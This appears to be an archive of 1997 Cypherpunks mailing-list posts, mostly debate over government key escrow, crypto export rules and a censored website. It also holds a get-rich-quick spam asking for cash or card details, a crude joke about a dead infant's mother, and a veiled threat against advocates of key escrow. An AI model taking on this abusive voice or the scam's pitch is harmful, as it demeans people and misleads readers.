]Newsgroups: relcom.commerce.computers,relcom.commerce.communications,relcom.demos.commerce,relcom.netnews,relcom.tcpip,relcom.www.users,relcom.www.support,relcom.hot-news,relcom.commerce.talk
]Subject: cmsg cancel <33c3c4a0.2317359 at news2.worldweb.net>
]Control: cancel <33c3c4a0.2317359 at news2.worldweb.net>
]Date: 9 Jul 1997 01:11:51 GMT
]Organization: Relcom/Eunet InterNetNews site
]Lines: 3
]Sender: vad at worldweb.net (Vadim Daskovsky)
]Approved: dmart at relcom.ru
]Message-ID: <5puogn$9f0$1 at news1.relcom.ru>
]NNTP-Posting-Host: news1.relcom.ru
]
]Excessive crossposting a.k.a. SPAM canceled. See Usenet newsgroup
]news.admin.net-abuse.misc for details.
]Coordinator of relcom.* newsgroups Dmitri Martynoff .

And now some friends of Tim are forging cancels for any traffic originating
from UUNet, irrespective of contents, and Tim Skirvin approves of it.

Tell your news admin to stop processing cancels immediately.

> 	It might interest you to know that a cancel will kill all the
> crossposts in a single message, BTW.  Your "cancelling 99 of the 100
> articles thing" does save lots of reader time.
>
> 	(If you're going to talk about cancels authoritatively, please
> read my Cancel FAQ - it's got huge piles of information on this stuff.)

Please be advised that all of Tim Skirvin's FAQs are full of lies (except
for the parts plagiarized from David Stodolsky :-).

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From tcmay at got.net  Fri Aug  1 17:28:37 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 08:28:37 +0800
Subject: Denning backs away from GAK
In-Reply-To: 
Message-ID: 



At 1:49 AM -0700 8/1/97, Vin McLellan wrote:

>	To note the obvious, the Constitutional argument cuts both ways,
>with warranted access to "private papers," versus the Founding Fathers'
>proto-privacy and their rude distrust of federal power.  (It's kind of like
>the abortion debate, where the premise you start off with almost dictates
>which conclusion you arrive at, many steps later.)  Denning's pragmatic,
>utilitarian, arguments are useful, but I suggest they mask a deeper shift
>of primacy among competing principles.

But the Constitution has never been interpreted as placing prior restraints
on strength of locks, on shades over windows, etc. Nor on whispering or
speaking in code phrases to deter eavesdroppers.

(Nor, obviously, as the "warranted access" Vin speaks about _ever_ been
construed to mean that house keys must be deposited in advance ("escrowed"
in newspeak) with law enforcement.)


It is this prior restraint on the strength of security technology which is
at issue. If a proper warrant is gotten, the disclosure of papers may be
compelled. Whether they can be gotten depends on a lot of things. Just as
with physical papers, which may or may not be retrievable.


>about this, it will be _very_ interesting.)  Denning, like many on the
>other side, is smart & idealistic.  This study and other recent statements

Well, this is your opinion. I've read a lot of her stuff, and heard her
speak, and I can't agree with your characterization.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From jya at pipeline.com  Fri Aug  1 17:53:07 1997
From: jya at pipeline.com (John Young)
Date: Sat, 2 Aug 1997 08:53:07 +0800
Subject: JYA Axed
Message-ID: <1.5.4.32.19970802003043.006cb0a8@pop.pipeline.com>



The ISP for jya.com, PrimeHost, an AOL subisidiary, has axed
the site.

We learned of this today after trying for a week to get an answer 
to why the site vanished. Tech said call Sales, Sales said it's not 
us, it's got to be Tech. Tech said it's definitely not us, and if it's
not Sales or us it must be Bosses.

Finally, a Boss was reached who said the site was "intentionally pulled." 
He claimed that it was "not a serious problem, so don't be alarmed," 
and sang cheerily about "some files" without elaboration.

Maybe more next week, and we pray it turns out to be hysterically
alarming and not merely a pissed Intel Prop owner seeking pay.

JYX.com is still up, thanks to PrimeHost's autosub. Ten files there -- 
so far.

We're humping to get the latest 60-page package of the RSA v. PGP 
suit there this weekend, thanks to Nobody.






From tcmay at got.net  Fri Aug  1 17:57:53 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 08:57:53 +0800
Subject: Using Strong Crypto to Forcefully Liberate Palestine
In-Reply-To: 
Message-ID: 



At 5:06 PM -0700 8/1/97, Lauren Amy Gelman wrote:
>---------- Forwarded message ----------
>Date: Fri, 01 Aug 1997 16:24:40 -0400
>From: Aaron Pressman 
>Subject: reuters crypto story
>
>
>Human rights groups favor strong encryption abroad
>  WASHINGTON, Aug 1 (Reuter) - Human rights activists came to Capitol Hill
>on Friday to tell lawmakers of their need to use strong computer encoding
>programs, subject to strict U.S. export limits, in their work outside the
>country.
...

I rather suspect that the human rights groups working for the liberation of
Palestinians are characterized as "terrorists" by the Zionists and by the
U.S. Government for their work in helping to destroy the Zionist Entity.

As this relates to crypto, don't we all think the U.S. Government would
provide decryption keys if the exported Key Recovery software were being
used by the freedom fighters against the Zionist Entity?

Likewise, Phil Zimmermann's favorite example, the freedom fighters in the
jungles of Burma, using laptops and PGP to fight the Rangoon-based
oppressors, would be "turned" by the USG just as soon as it became policy
to support the government in Rangoon.

No human rights group can ever count on the USG. And why anyone who thinks
this is welcome to escrow their keys voluntarily. But if they try to escrow
the keys of others, they need to be taken care of in the usual way.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Fri Aug  1 18:54:54 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 09:54:54 +0800
Subject: http:--www.cnn.com-US-9707-31-breast.milk-
In-Reply-To: <199708010310.WAA24360@einstein.ssz.com>
Message-ID: 



At 8:10 PM -0700 7/31/97, Jim Choate wrote:

>
>     TUCSON, Arizona (AP) -- Police have charged a woman with murder,
>     claiming her breast milk was so full of heroin and methadone that it
>     killed her 7-week-old daughter.
>

Too bad she'll go to prison, as I heard she has killer tits.


(My apologies to the wimminfolk here...I couldn't resist. Besides, women I
know are equally willing to make similar jokes, e.g., the gal who deride
rock music favored by young men as "cock rock. I then asked her what she
thought of "clit lit." She laughed.)

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rah at shipwright.com  Fri Aug  1 19:02:27 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 2 Aug 1997 10:02:27 +0800
Subject: PCs, bitte.
Message-ID: 




--- begin forwarded text


X-Lotus-FromDomain: BIONOMICS at INTERLIANT @ OUTBOUND
From: "VitaminB"
To: "DAILY DOSE"
Date: Fri, 1 Aug 1997 17:05:28 -0700
Subject: <>(August 1, 1997) Going their own way
Mime-Version: 1.0






Vitamin B:
Your Daily Dose of Bionomics

August 1, 1997

Going their own way

Even though Germany had signed a pledge
to forget about taxing the Internet earlier this
month, it seems that its parasitic bureaucracy
has other ideas.  A recent multimedia law in
Germany has defined Internet PC's as devices
that can receive audio and video, so the
Gebuehreneinzugszentrale (GEZ), the collector
of the TV tax in Germany, has decided that this
tax applies to PC's as well.  What does this mean
for business?  According to the GEZ, companies
with 100 Internet-enabled PC's will be charged
1000 Marks (about $555), whether the PC's actually
run audio or video or not.

For those unfamiliar with the GEZ, this is the
organization which enforces the TV tax by going
into peoples homes and checking to see how many
sets they own and in some areas driving around
in special trucks to determine which houses receive
signals.

Bureaucracies, in an almost living way, seem to write
their own code and respond viciously to threats to
their territories.  Unless the German government
finds a way to limit the power of its bureaucracy,
that territory will get bigger all the time.

Source:  _Ziff-Davis Network News_, July 30, 1997

--- end forwarded text



-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From nor at dev.null  Fri Aug  1 19:02:39 1997
From: nor at dev.null (NO Remailer)
Date: Sat, 2 Aug 1997 10:02:39 +0800
Subject: New Non-Remailer Announcement
Message-ID: <199708020149.TAA12859@wombat.sk.sympatico.ca>



   ANNOUNCEMENT: "NO Remailer" Still Doesn't Work!
   -----------------------------------------------

  Doesn't work, and probably never will...
  It is unlikely that attempts to get my drinking under control are
going to be any more successful in the future than they have in the
past, so the "NO Remailer" will never likely be of any use to those
who wish to send anonymous email.
  However, if you are an impulsive person who is continuously sending
out anonymous email that only comes back to haunt you and get you into
trouble, then perhaps you should use the "NO Remailer." That way, you
will get the satisfaction of sending the email, but will not suffer the
consequences of it actually being delivered.
  Also, since our email often bounces when we are behind on payments to
our ISP, you will get an opportunity to review your attempts at sending
anonymous email, thus helping you to notice the really stupid things
you say and do (such as including your .sig line in the nasty letter to
your boss).

  In short, the "NO Remailer" is perfect for those whose lives are a
mess and/or who are as big a loser as the "NO Remailer" operator.






From rah at shipwright.com  Fri Aug  1 19:04:10 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 2 Aug 1997 10:04:10 +0800
Subject: JYA Axed
In-Reply-To: <1.5.4.32.19970802003043.006cb0a8@pop.pipeline.com>
Message-ID: 



At 8:30 pm -0400 on 8/1/97, John Young wrote:


> The ISP for jya.com, PrimeHost, an AOL subisidiary, has axed
> the site.

Ain't this 'self-censorship' stuff a bitch...

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From whynotu at NaturalInstincts.com  Sat Aug  2 10:06:24 1997
From: whynotu at NaturalInstincts.com (whynotu at NaturalInstincts.com)
Date: Sat, 2 Aug 1997 10:06:24 -0700 (PDT)
Subject: Hello There
Message-ID: <199708021236.IAA16683@hitsrus.com>





Please accept our apology if this was sent to you in error!
If we have by mistake, please see removal instructions below.
=============================================================          


Dear Friend:

We know how frustrating it is for most Online Marketers. 

You try and try, and just don't seem to get anywhere. 

And by anywhere, we mean...Make Money!

You see, we've discovered a few secrets that we're going to share
with you. 

Other people who already have this report found it helpful to
print it out, sit back and read it, and spend a little time
letting all of the ideas sort of sink in.

We assure you, if you'll take just a few minutes to really
concentrate on what we've given you here, you'll find this
invaluable and worth tens of thousands of dollars
(or more) to you.

Anyway, that's all for now...print it out, spend a few minutes
with it and look it over.

But first, let me tell you a little story...
          
Right now there are over forty million people surfing the Internet. 
By the year 2000, that figure is expected to more than double.
With so many people using the Internet, smart "net"repreneur's are
taking advantage of what this new (in terms of true commercial 
application) and exciting medium has to offer.

The Internet presents one of the best ways to make money that has
ever been introduced. On any given day you have the opportunity to 
reach more people than most cities have population wise. This is the 
reason so many businesses are scrambling to make their presence 
known on the Internet. 

Being "online" offers a person the ability to reach multitudes 
of people from all over the world.  It also offers, to those who
know how, THE ABILITY TO MAKE EXCELLENT MONEY. And we
do mean excellent money!!!

CONSIDER THIS POSSIBILITY:  You wake up in the morning and you 
put on a pot of coffee. As you sip on your cup of hot "brew" you saunter 
over and turn your computer on. Then, as your monitor glows from dim to 
bright, you find that you have inquiries from all sorts of people requesting 
what you have to offer. Later, after you have finished reading your
inquiries, you stroll out to your mailbox. You find it is filled with letters from
people from all across the world! What's even better though, is that the letters 
are FILLED WITH MONEY; cash, checks, and money orders. Then, after 
tallying up the totals, you find that you have made anywhere between 
$200 to $1,000 and it isn't even one o'clock in the afternoon. 
 
Think of it: NO boss, NO traffic, and NO annoying Co-workers. Wouldn't
it feel great to wake up in the morning knowing you were going to be 
making excellent money but didn't have to leave your house to do it!?! 
Wouldn't your life be far less complicated?

The truth is, you can also be one of those who become financially
independent via the Internet. AND THE BEST PART IS...IT DOESN'T 
REQUIRE A LOT OF MONEY!!

What it does require is the knowledge of how, what, and where to 
do it. And that is where we can help. We can provide you with the 
knowledge of how to begin earning substantial income from your 
computer via the "information superhighway".   

And just so you know- THIS IS NOT A MLM, AND NO YOU DON'T 
WORK FOR US! YOU DO WHATEVER YOU CHOOSE! We just provide 
you with the information of how to make MONEY online. 
Even if you are unsure as to what to do, we will provide you 
with ideas for the some of the best online businesses and the secrets of 
bulk emailing.

Throughout a year of trial and error, we have found the best tools to 
begin a successful money making Internet business.  We will show you 
how to start with very little money and yet achieve maximum results.  Our 
information includes suggestions on some of the best places you
should be investing your money as well as how to get the most impact for
your dollar.  The report provides you with information crucial to your future
business growth as an "online" company.  We will provide you with a number 
of the critical tools you need to begin a highly profitable business from your
own computer.

This is a wonderful opportunity, we urge you to take advantage of it.
You won't find too many people that will give away ALL of their secrets!!
The majority of the people today, who are rich, have copied what someone
else is or has been doing.  That is what we are offering you now--a chance
to copy our success!!  It is very easy and we ARE for REAL!

Sound too good to be true?  That's what others have said.  That is, until they
Received their kit and saw for themselves just how easy it is to make money
On the net!


Hi NI,

I received your report and free bonuses last Saturday and wanted to 
congratulate you on a job well done. I read through your report "How 
To Profit From The Internet" and I'm very impressed.  I have bought 
other books and manuals about Online Marketing, Direct Marketing, 
E-mail, Mail Order, etc. Yours is the only one that explains the subject 
in a easy to understand language.  I finally found the secrets I've been
looking for. 

Once again, Great Job!

Sincerely,

John Strand - Satisfied Customer



My late father always told me, "remember, Michele, there is no free
lunch in life.  You get out of life what you put into it."  Through
trial and error and a somewhat slow frustrating start, I purchased your
report and finally figured out how to start a very profitable business from 
my home. Your report is great, you give the average person the tools and 
secrets to succeed.  I know my dad would have been very proud of me.
I can't thank you enough =)

Michele B from Oregon


Here's a little more incentive to check this out�

	~IF YOU ORDER WITHIN 3 DAYS~

We will send you:

 ****FREE $400 Bulk e-mail Software****
 ****FREE $200 Check by phone, fax, email Software****
 ****FREE $10 Calling Card****
 
----PLUS----

We will send you a list of over 100 major search engines ready to surf on the
Internet or to place a free link to your web page.  And that's not all! Also,
you will receive a list of 98 of the best inexpensive newspapers to advertise in.
The list is complete with papers name, city, phone number, circulation and 
frequency  (Daily or Weekly).  Some advertisers are selling this bonus for $49.95.
Imagine what a great offering we are giving you for FREE! 

And that's not all,  we will also include with our report "How To Write A Great E-mail
Ad "! You will find that this report by itself is worth thousands of  dollars to you. 
These bonuses alone are worth several times the cost of the report.

Are we nuts?

No, it just shows how confident we are that you'll be delighted
with the information you'll have...just like the others who are
already using the information and making money.  You will be 
suprised how quickly you can be earning money on the Internet!
 
So, if you are seriously interested in learning how to acquire wealth by
being online,  ACT NOW!!


Send $29.97 cash, check, money order or credit card information to:


Natural Instincts
4676 Commercial St. SE  Suite 201 
Salem, Oregon 97302



Please print out the order form and mail
it along with your payment.


_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

ORDER FORM

Yes, I'd like to get started immediately. Please send me
"How To Profit From The Internet", and my FREE bonuses today!


NAME______________________________________________________

ADDRESS___________________________________________________

CITY_______________________ STATE__________  ZIP__________

Deliver "How to Profit from the Internet" to the
following email address:

E-MAIL ADDRESS____________________________________________

Please check one of the following:

( )  I'm ordering within 3 days, please send my FREE software, $10.00 calling 
card and "How To Profit From The Internet" for the unbelievable low price 
of $29.97 today.

( )  I'm not ordering within the first 3 days of receiving this letter, so I agree to
pay the full price of $49.97 and wish to only receive your report "How To Profit
>From The Internet".


Payment Method:


[ ] Check (Checks will take an additional 7 days for processing)

[ ] Cash

[ ] Money Order

( ) Credit Card
 
(note: we accept all credit cards and check/debit cards)
  
Name of Credit Card _____________________________

Name as it appears on Card: _________________________________

Card Number: __________________________________

Expiration Date: _____ / _____

Signature of Card Holder _________________________


_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _


THE MARKET IS HERE - TODAY!      TAKE ADVANTAGE OF IT!!!!!
After you receive your report, I'll answer any questions time permits via email. 
I'm looking forward to helping you succeed in your new business!

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _


Thanks for your order, and best regards!



///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro E-Mail Software.  If you wish to
be removed from our future mailings, please reply with the subject "Remove" and 
this software will automatically block you from our future mailings.  Thank you.
////////////////////////////////////////////////////////////////////////////////







From stewarts at ix.netcom.com  Fri Aug  1 19:44:20 1997
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 2 Aug 1997 10:44:20 +0800
Subject: Denning backs away from GAK
In-Reply-To: 
Message-ID: <3.0.2.32.19970801185452.007746e8@popd.ix.netcom.com>



>Tim May writes:
>> And her "second thoughts" on GAK were not based on a principled 
>> repudiation of the concept of "escrowing" keys, or on Constitutional 
>> grounds, but only on the grounds that her study did not show that many 
>> criminal cases were much affected by the lack of key escrow.

That's fine - if we wanted people to oppose crypto-censorship on
moral or political grounds, we could ask the ACLU or EFF or CypherpunkCabal.
Professor Denning's position has never been that eavesdropping and
key escrow are required on the grounds of principle - it's
Louis Freeh's job to say "we can't go upsetting Law Enforcement's
traditional ability to eavesdrop on you, that'd be UnAmerican".
Her important contributions to the Bad Guys' position has been to say that
"Law enforcement needs your keys because there's no practical alternative",
which reinforces the FBI's and NSA's arguments.  Now that she's saying
"Law enforcement doesn't really need your keys, they're doing just fine
without them, even in spite of all the insider talks they've given me"
that knocks the utilitarian leg out from under them.  That's very good.

Won't stop the Bad Guys from trying, of course, but it's a good start.
On the other hand, it'll probably provide extra ammunition for the current
"legalize exports but criminalize use of crypto in crime" bills,
which gives the government more power than they've had before domestically
at the cost of losing the export battle which they were losing anyway.






#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
# You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp
#   (If this is a mailing list or news, please Cc: me on replies.  Thanks.)






From tcmay at got.net  Fri Aug  1 20:25:09 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 11:25:09 +0800
Subject: Denning backs away from GAK
In-Reply-To: <199707311824.LAA25935@slack.lne.com>
Message-ID: 



At 6:54 PM -0700 8/1/97, Bill Stewart wrote:
>>Tim May writes:
>>> And her "second thoughts" on GAK were not based on a principled
>>> repudiation of the concept of "escrowing" keys, or on Constitutional
>>> grounds, but only on the grounds that her study did not show that many
>>> criminal cases were much affected by the lack of key escrow.
>
>That's fine - if we wanted people to oppose crypto-censorship on
>moral or political grounds, we could ask the ACLU or EFF or CypherpunkCabal.
>Professor Denning's position has never been that eavesdropping and
>key escrow are required on the grounds of principle - it's
>Louis Freeh's job to say "we can't go upsetting Law Enforcement's
>traditional ability to eavesdrop on you, that'd be UnAmerican".
>Her important contributions to the Bad Guys' position has been to say that
>"Law enforcement needs your keys because there's no practical alternative",
>which reinforces the FBI's and NSA's arguments.  Now that she's saying
>"Law enforcement doesn't really need your keys, they're doing just fine
>without them, even in spite of all the insider talks they've given me"
>that knocks the utilitarian leg out from under them.  That's very good.

I disagree. A likely scenaria, I fear, is this:

* Denning's new study gets publicity

* Denning is "redeemed" and gains new influence

* GAK is delayed for this year

* Denning continues her study

* Next year's report finds solid evidence that crypto is being used to
hinder investigations, and has indeed had an effect.

(Hey, even dumb freedom fighters, er, "terrorists," will soon be using
strong crypto in ways that will surely affect investigations....)

* Denning's new conclusions, and her redemption, will generate support for GAK.

Classic "good cop, bad cop" and "bait and switch."

We've discussed this before. Just as the CDA was best attacked on
constitutional or basic issues, and not on whether porn was or was not
available on the Net, so, too, should GAK be attacked on constitutional or
basic issues, not on whether investigations have or have not been affected
by crypto.

Those who live by utilitarian arguments will die by utilitarian arguments.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Fri Aug  1 20:30:30 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 11:30:30 +0800
Subject: Bionomics banned as a cult in Germany?
In-Reply-To: 
Message-ID: 



At 6:40 PM -0700 8/1/97, Robert Hettinga wrote:
>--- begin forwarded text
>

>Vitamin B:
>Your Daily Dose of Bionomics
>

>Even though Germany had signed a pledge


Hey, I thought "bionomics" had been banned as an illegal and dangerous cult
in Germany?

(Sure seems like a whacked-out newage cult to me....)


--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rah at shipwright.com  Fri Aug  1 21:27:07 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Sat, 2 Aug 1997 12:27:07 +0800
Subject: Bionomics banned as a cult in Germany?
In-Reply-To: 
Message-ID: 



At 11:25 pm -0400 on 8/1/97, Tim May wrote:


> Hey, I thought "bionomics" had been banned as an illegal and dangerous cult
> in Germany?
>
> (Sure seems like a whacked-out newage cult to me....)

Yeah. Even Newt, Peter Huber, and Stewart Brand are cult members.

:-).

Cheers,
Bob

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From enoch at zipcon.net  Fri Aug  1 21:39:03 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Sat, 2 Aug 1997 12:39:03 +0800
Subject: Denning backs away from GAK
In-Reply-To: 
Message-ID: <19970802043128.30258.qmail@zipcon.net>



Tim May writes:

 > * Next year's report finds solid evidence that crypto is being used to
 > hinder investigations, and has indeed had an effect. 

This is obviously the strategy here.  If we lend credibility to the
examination of chicken entrails because the Sorcerer is saying something
we agree with, then we are powerless to denounce the process as flim-flam
when we wake up one morning and find ourselves no longer in the Sorcerer's
graces. 

Similarly, if we buy into the notion that national crypto policy should be
dictated by the needs of law enforcement, instead of fundamental
Constitutional considerations, because law enforcement is purring and
courting our favor, then it is only a matter of time before we find that
we have stupidly oiled the very machinery which will be used for our
beheading.

As Tim says, stick with Constitutional arguments, not utilitarian ones,
and beware of Wise Persons from the East bearing Gifts.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From vznuri at netcom.com  Fri Aug  1 22:01:35 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Sat, 2 Aug 1997 13:01:35 +0800
Subject: Canada's Entrust does end-run around ITAR
Message-ID: <199708020443.VAA10553@netcom13.netcom.com>




------- Forwarded Message

Date: Fri, 01 Aug 1997 18:13:20 -0700
From: kalliste at aci.net (J. Orlin Grabbe)
To: snetnews at world.std.com
Subject: SNET: [Fwd: Another torpedo slams into Clinton crypto policy]


- ->  SearchNet's   SNETNEWS   Mailing List

Path: news.alt.net!news1.alt.net!news-chi-13.sprintlink.net!news-east.sprintlink.net!news-dc-26.sprintlink.net!news-peer.sprintlink.net!news-pull.sprintlink.net!news-in-east.sprintlink.net!news.sprintlink.net!Sprint!205.185.79.4!zdc!super.zippo.com!lotsanews.com!szdc!newsp.zippo.com!news1
From: jqp at globaldialog.com
Newsgroups: alt.current-events.clinton.whitewater,alt.politics.clinton
Subject: Another torpedo slams into Clinton crypto policy
Date: Fri, 01 Aug 1997 00:21:25 -0500
Organization: None
Message-ID: <33E17255.18BB at globaldialog.com>
Reply-To: jqp at globaldialog.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Mailer: Mozilla 3.0Gold (Win95; I)
Xref: news.alt.net alt.current-events.clinton.whitewater:189839 alt.politics.clinton:338125

NY Times
August 1, 1997

Canadian Product Puts New Spin on Encryption Debate

By PETER WAYNER 

Canadian company's recent release of a new 
encryption product and subsequent announcement 
that it had received a license from Canada to 
export the product has surprised many companies 
and U.S. officials. 

The release was startling because the United States 
and Canada historically regulated the encryption-
exporting issue in synchrony. 

The company, Entrust Technologies Ltd., released 
a free version of its Entrust/Solo software on 
Tuesday, and announced that they had received a 
license from the Canadian government to export 
it to almost all of the world. 

- -=- [TABLE] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

THE MOVE BY ENTRUST SEEMS TO EXPLOIT A DIFFERENCE 
IN THE REGULATIONS BETWEEN THE UNITED STATES AND 
CANADA.

- -=- [TABLE] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This decision by Canada could signal a major rift 
developing between two allies over an issue that 
is becoming increasingly important to the computer 
software industry. 

In fact, the move seemed to startle the [*]Bureau 
of Export Affairs at the U.S. Department of Commerce. 
James Lewis, director of strategic trade at the 
bureau, would only issue a one-sentence statement 
through a spokeswoman: "This is under review as 
a potential enforcement matter." He offered no 
insight into which American laws were being violated. 
Shauna White, a spokeswoman for the company, said 
"We believe we are in full compliance with all 
the Canadian laws that apply." 

In the past, the United States and Canada enforced 
their encryption regulations with such cooperation 
that most controlled products are shipped in boxes 
announcing, "For U.S. and Canada only." The U.S. 
government was certain that Canadian regulations 
would block anyone from shipping the product out 
of Canada. 

Those regulations are still in place and there 
has been no change in the effect on products built 
in the United States. Programs written by Canadians,
however, are another matter. Entrust was able to 
qualify for a license because their software contained 
what John Ryan, the company president and chief 
executive, said was "100 percent Canadian content." 
That is, it was developed in Canada by Canadian 
citizens. 

Entrust Technologies Inc. was spun off on Jan. 
2, 1997, from Nortel (Northern Telecom) after Nortel 
developed the Entrust product. Entrust Technologies 
Inc. is based in Dallas, but most of the development 
work is done in Ottawa, Ontario, where the Canadian 
subsidiary, Entrust Technologies Ltd. has its offices. 
Ryan, for instance, is a Canadian citizen. 

The move by Entrust seems to exploit a difference 
in the regulations between the United States and 
Canada. Both countries are members of the Wassenar 
Arrangement on Arms Export Controls, a set of loosely 
controlled rules that took the place of Cold War-
era regulations designed to reign in conventional 
arms and dual-use technologies. 

The arrangement regulates the export of encryption 
software but provided an exemption for general-
use software that was freely available through 
either the public domain or widespread public channels 
like stores. Ryan explained: "Many countries have 
chosen to 'to turn that part off.' Canada has not 
chosen to turn that part off." 

The existence of this regulatory difference may 
have come as a surprise to many people in the United 
States because the Canadian software industry has 
not yet produced a top-rank international competitor. 
The academic computer science departments at colleges 
like the University of Toronto are first rate, 
but there are no companies with the same public 
presence as Microsoft or IBM. 

But Entrust Technology's emergence shows how quickly 
the public perception can become obsolete in the 
swiftly moving world of technology. The company 
is clearly hoping that its free version of the 
Entrust/Solo software will build acceptance for 
the commercial versions, which are also freely 
exportable. Many other companies follow the same 
strategy of releasing free versions to the public 
in order to publicize the commercial versions, 
which usually come with more features. 

Entrust allows people to download free copies of 
Entrust/Solo for personal use from their Web site,
but they block requests from seven restricted countries:
Libya, Iran, Iraq, Cuba, Angola, Syria and North 
Korea. France and Singapore are also blocked because 
they have restrictions on the import of technology. 

Entrust is already in heavy competition against 
a U.S. company, [*]Pretty Good Privacy Inc., which 
is circulating a free version of its encryption 
package, PGP 5.0. This version is available for 
home and non-commercial use without charge. The 
software, however, was developed in the United 
States and can't be exported without a license. 
The company has worked closely with the U.S. Commerce 
Department to smooth licenses for major U.S. companies 
seeking to use the software with their subsidiaries,
but an individual license must still be granted 
in each case. 

Kelly Huebner Blough, director of government relations 
for Pretty Good Privacy, said: "Well, of course 
we would like the U.S. to license exports more 
liberally. Most of the other countries in the world 
license encryption software more freely. They may 
have strong policies on the books, but when it 
comes to implementation, the U.S. is the most restrictive." 

- -=- [TABLE] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

ALL OF THE MAJOR SOFTWARE COMPANIES LIKE MICROSOFT,
IBM AND SUN CONTINUE TO PRESS THE U.S. GOVERNMENT 
FOR RELIEF OF THE EXPORT CONTROL LAWS, ARGUING 
THAT BETTER AND BETTER SOFTWARE IS EMERGING THROUGHOUT 
THE WORLD.

- -=- [TABLE] -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Other companies will also be feeling the pressure. 
Ray Ozzie, the president of Iris, the developer 
of Lotus Notes, which is now owned by IBM, said:
"This is further proof that easy-to-use, high-grade 
encryption products are available worldwide, and 
that U.S. companies continue to be at a disadvantage 
in the world marketplace. U.S. policy needs to 
change in order to take these realities into account." 

One of the most vexing parts of the regulatory 
equation involves unraveling whether the U.S. government 
can exert any pressure on Entrust Technologies 
Ltd. through its U.S.-based corporate parent, Entrust 
Technologies Inc. The current version of the regulations 
restrict U.S. companies from providing "technical 
assistance" to their foreign companies--a rule 
